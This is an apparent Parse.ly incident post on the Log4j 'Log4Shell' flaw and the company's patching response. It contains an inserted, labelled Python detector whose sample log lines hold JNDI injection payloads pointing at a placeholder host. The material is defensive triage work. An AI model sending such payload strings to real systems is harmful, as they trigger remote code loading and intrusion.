A new vulnerability in Apache Log4j, a popular logging library for the Java programming language, was disclosed on December 9, 2021. A proof-of-concept was posted to a GitHub repository and on Twitter. The CTO of Cloudflare has a nice write-up on how this exploit works under the hood. The vulnerability allowed remote code execution (RCE) on any system where an attacker could cause a specially crafted string to be written, unaltered and unencoded, into a log message, otherwise known as a "log injection" attack.
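As an added illustration that is not part of the Parse.ly post, the following Python check is the kind of thing a defender runs over web access or application logs during triage: it flags request fields carrying the `${jndi:...}` lookup syntax that an unpatched Log4j would have evaluated. The log lines, client addresses and hostname are constructed samples, and the assumption is that no legitimate client ever sends that syntax.

```python
import re
from typing import List

# Matches the lookup syntax Log4j 2.x evaluated inside log messages before the fix:
# a "${" opener, the "jndi" prefix, then a scheme name, case-insensitive.
# Assumption: any ${jndi:...} in an untrusted field is worth an alert.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample lines in a combined-log-like layout (not real traffic).
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:01:02:03 +0000] "GET /api/v1/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:01:02:04 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup-host.invalid/a}"',
    '198.51.100.7 - - [10/Dec/2021:01:02:05 +0000] "GET /?q=${JNDI:rmi://lookup-host.invalid/x} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '198.51.100.8 - - [10/Dec/2021:01:02:06 +0000] "GET /docs?price=${total} HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]


def find_jndi_lookups(lines: List[str]) -> List[dict]:
    """Return one finding per log line that contains a JNDI lookup.

    Each finding records the 1-based line number, the client address
    (first whitespace-separated field) and the lower-cased JNDI scheme.
    Lines with ordinary ${...} text (e.g. a template variable) are not flagged.
    """
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "scheme": match.group(1).lower(),
            })
    return findings


if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {finding['line']}: {finding['client']} sent a jndi:{finding['scheme']} lookup")
```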
The Parse.ly team was alerted to this vulnerability within hours of it being published. We first assessed Parse.ly edge systems (e.g. data collection, dashboard, and API) and determined that since we use a combination of Python- and C-based systems (not Java or JVM systems), we were not affected at the edge. However, a detailed inventory of our cloud environment revealed some internal databases and data processing systems that make use of Java. As a result, our on-call team declared this a high-priority incident and began patching all of the Java code in our production and development environments.
The Parse.ly team has since patched all of these systems, and internal analysis shows no evidence of a security incident. Many internet companies were affected by this vulnerability, such as Apple, Steam, and Twitter, as detailed in this Ars Technica article. However, compromising one of Parse.ly's internal systems would have required specially crafted messages built with detailed knowledge of our internal network and internal data processing flows, as well as the triggering of very specific and esoteric edge cases in these systems. Thankfully, as of now, all the systems are patched, so this vulnerability is mitigated.
Parse.ly takes the security of its customers' data very seriously and will continue to monitor and patch in response to any future security issues. See also our status page incident, where maintenance operations related to system patching were started and then completed.